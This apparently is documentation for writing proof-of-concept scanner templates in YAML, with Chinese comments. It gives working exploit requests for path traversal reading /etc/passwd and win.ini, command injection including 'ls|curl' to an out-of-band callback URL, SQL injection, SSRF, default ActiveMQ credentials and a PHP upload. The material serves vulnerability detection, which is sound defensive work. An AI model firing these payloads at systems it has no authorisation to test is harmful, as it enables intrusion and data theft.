/etc/passwd
c:/windows/win.ini
id
ls
rev
{{randstr}}
| revresponse.status == 200
这样的规则,这样基本等于会多发一个请求,理论上多少都应该有一些特征。name: poc-yaml-test-unauth
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /admin/
expression: response.status == 200 && response.body_string.contains("<title>Admin</title>") && response.body_string.contains("<h2>DController</h2>")
expression: r0()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test
manual: true
transport: http
rules:
linux:
request:
cache: true
method: GET
path: /test/../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
windows:
request:
cache: true
method: GET
path: /test/../../../../Windows/win.ini
expression: response.status == 200 && response.body_string.contains("for 16-bit app support")
expression: linux() || windows()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test
manual: true
transport: http
rules:
r0:
request:
cache: true
method: GET
path: /test.aspx?filePath=../../web.config
follow_redirects: true
expression: response.body_string.contains('<add key="MyServerIP"') && response.body_string.contains('<add name="ConnectionString" connectionString="') && response.body_string.contains('<sessionState mode="InProc"')
expression: r0()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test-php-rce
manual: true
transport: http
set:
s1: randomInt(100000000, 200000000)
s2: randomInt(10000, 20000)
rules:
r0:
request:
cache: true
method: POST
path: /index.php
headers:
Content-Type: application/x-www-form-urlencoded
body: <?={{s2}}-{{s1}};
expression: response.status == 200 && response.body_string.contains(string(s2 - s1))
expression: r0()
detail:
author: test
links:
- https://test.com
bstartsWith
方法或者尝试匹配网页中的其他特征。
例如,计算的结果直接返回,并无其他附加,那么这个时候就可以使用response.body.bstartsWith(bytes(string(s1 - s2)))
name: poc-yaml-test-rce
manual: true
transport: http
set:
s1: randomInt(100000, 200000)
s2: randomInt(10000, 20000)
rules:
# windows的情况
r0:
request:
cache: true
method: POST
path: /test
headers:
Content-Type: application/x-www-form-urlencoded
body: |
id=set /A {{s2}}-{{s1}}
expression: response.status == 200 && response.body_string.contains(string(s2 - s1))
r1:
request:
cache: true
method: POST
path: /test2
headers:
Content-Type: application/x-www-form-urlencoded
body: |
id=type c:/windows/win.ini
expression: response.status == 200 && response.body_string.contains("for 16-bit app support")
# linux的情况
r2:
request:
cache: true
method: POST
path: /test
headers:
Content-Type: application/x-www-form-urlencoded
body: |
id=expr {{s1}} - {{s2}}
expression: response.status == 200 && response.body_string.contains(string(s1 - s2))
r3:
request:
cache: true
method: POST
path: /test
headers:
Content-Type: application/x-www-form-urlencoded
body: |
id=echo {{s1}}-{{s2}}|bc
expression: response.status == 200 && response.body_string.contains(string(s1 - s2))
r4:
request:
cache: true
method: POST
path: /test1
headers:
Content-Type: application/x-www-form-urlencoded
body: |
id=cat /etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1() || r2() || r3() || r4()
detail:
author: test
links:
- http://test.com
name: poc-yaml-test
manual: true
transport: http
set:
reverse: newReverse()
reverseURL: reverse.url
reverseDomain: reverse.domain
rules:
r0:
request:
cache: true
method: POST
path: /run
body: test=ls|curl+{{reverseURL}}
expression: reverse.wait(5) && response.body_string.contains("xxxx")
r1:
request:
cache: true
method: POST
path: /run
body: test=ls|ping+reverseDomain
expression: reverse.wait(5) && response.body_string.contains("xxxx")
expression: r0() || r1()
detail:
author: test
links:
- http://test.com
name: poc-yaml-test-sqli
manual: true
transport: http
set:
s1: randomInt(100000, 200000)
rules:
r0:
request:
cache: true
method: GET
path: /index.jsp?id=1%27%20union%20select%20md5({{s1}})
follow_redirects: true
expression: response.body_string.contains(substr(md5(string(s1)), 2, 28))
expression: r0()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test-sqli
manual: true
transport: http
set:
s1: randomInt(100000, 200000)
rules:
r0:
request:
cache: true
method: GET
path: /index.jsp?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20md5({{s1}})),0x7e),1)--
follow_redirects: true
expression: response.body_string.contains(substr(md5(string(s1)), 2, 28))
expression: r0()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test
manual: true
transport: http
set:
s1: randomLowercase(5)
a1: randomInt(10000, 100000)
a2: randomInt(10000, 100000)
rules:
r0:
request:
cache: true
method: POST
path: /test
headers:
Content-Type: application/x-www-form-urlencoded
body: id=aaa%27 and {{a1}}={{a2}} and %27{{s1}}%27=%27{{s1}}
follow_redirects: true
expression: response.body_string.contains("User authentication Failed")
r1:
request:
cache: true
method: POST
path: /test
headers:
Content-Type: application/x-www-form-urlencoded
body: id=aaa%27 and {{a1}}={{a1}} and %27{{s1}}%27=%27{{s1}}
follow_redirects: true
expression: response.body_string.contains("User Login Failed for XXXXXX User")
expression: r0() && r1()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test-sqli
manual: true
transport: http
set:
sleepSecond1: randomInt(5, 8)
sleepSecond2: randomInt(2, 4)
rules:
r0:
request:
cache: true
method: GET
path: /user/test.php?id=1%27)%20AND%20(SELECT(SELECT(SLEEP(0))))%23
expression: response.status == 200 && response.body_string.contains("xxxx")
output:
r0latency: response.latency
r1:
request:
cache: true
method: GET
read_timeout: "10"
path: /user/test.php?id=1%27)%20AND%20(SELECT(SELECT(SLEEP({{sleepSecond1}}))))%23
expression: response.latency - r0latency >= sleepSecond1 * 1000 && response.body_string.contains("xxxx")
output:
r1latency: response.latency
r2:
request:
cache: true
method: GET
read_timeout: "10"
path: /user/test.php?id=1%27)%20AND%20(SELECT(SELECT(SLEEP({{sleepSecond2}}))))%23
expression: response.latency - r0latency >= sleepSecond2 * 1000 && response.latency < r1latency && response.body_string.contains("xxxx")
expression: r0() && r1() && r2()
detail:
author: test
links:
- http://test.com
name: poc-yaml-test-url
manual: true
transport: http
set:
randomUrl: |
"http://" + randomLowercase(6) + ".com"
reverse: newReverse()
reverseUrl: reverse.url
rules:
r1:
request:
cache: true
method: GET
path: /user/test.php?url=example.com
follow_redirects: true
expression: response.status == 200 && response.body_string.contains("<title>Example Domain</title>") && response.body_string.contains("<h1>Example Domain</h1>")
# 仅在SSRF访问不到外面的情况下使用反连进行测试
r2:
request:
cache: true
method: GET
path: /user/test.php?url={{reverseUrl}}
expression: response.status == 200 && reverse.wait(3)
expression: r1() || r2()
detail:
author: test
links:
- http://test.com
name: poc-yaml-activemq-weak-password
manual: true
transport: http
payloads:
payloads:
p1:
username: r"admin"
password: r"admin"
auth: base64(username + ":" + password)
rules:
check:
request:
cache: true
method: GET
path: /admin/
expression: response.status == 401 && response.body.bcontains(b"Unauthorized")
auth:
request:
cache: false
method: GET
path: /admin/
headers:
Authorization: Basic {{auth}}
expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
expression: check() && auth()
detail:
author: Chaitin
links:
- http://test.com
multipart/form-data; boundary=---------------------------16314487820932200903769468567
中的boundary应随机化name: poc-yaml-test
manual: true
transport: http
set:
s1: randomLowercase(20)
s2: randomLowercase(20)
rboundary: randomLowercase(8)
rules:
r0:
request:
cache: true
method: POST
path: /test
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file-upload\"; filename=\"{{s1}}.php\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
<?php echo \"{{s2}}\"; unlink(__FILE__); ?>\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
follow_redirects: false
expression: response.status == 200 && response.body_string.contains(s1)
output:
search: '"(?P<tmp>.+?)".bsubmatch(response.body)'
tmp: search["tmp"]
r1:
request:
cache: true
method: GET
path: /test/{{tmp}}/{{s1}}.php
follow_redirects: false
expression: response.status == 200 && response.body_string.contains(s2)
expression: r0() && r1()
detail:
author: test
links:
- https://test.com
name: poc-yaml-test
manual: true
transport: http
rules:
r0:
request:
cache: true
method: POST
path: /test
headers:
Content-Type: application/xml
body: "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodCall>\r\n<methodName>WorkflowService.getAttachment</methodName>\r\n<params><param><value><string>/etc/passwd</string>\r\n</value></param></params></methodCall>"
expression: response.status == 200 && "root:[x*]:0:0:".matches(base64Decode("<base64>(?P<base64>.*)</base64>".bsubmatch(response.body)["base64"]))
expression: r0()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test
manual: true
transport: http
set:
rs: randomLowercase(20)
rules:
r0:
request:
method: GET
path: /?sql=select UPPER('{{rs}}')
expression: response.body_string.contains(upper(rs))
expression: r0()
detail:
author: test
links:
- https://www.test.com
name: poc-yaml-test
manual: false
transport: tcp
rules:
r0:
request:
content: "stats"
read_timeout: "3"
expression: response.raw.bcontains(b"STAT pid") && response.raw.bcontains(b"STAT version")
output:
version: '"STAT version (?P<version>[\\d\\.]+)".bsubmatch(response.raw)["version"]'
host: response.conn.destination.addr
expression: r0()
detail:
author: test
fingerprint:
infos:
- name: "memcache"
version: "{{version}}"
host_info:
hostname: "{{host}}"
Was this page helpful?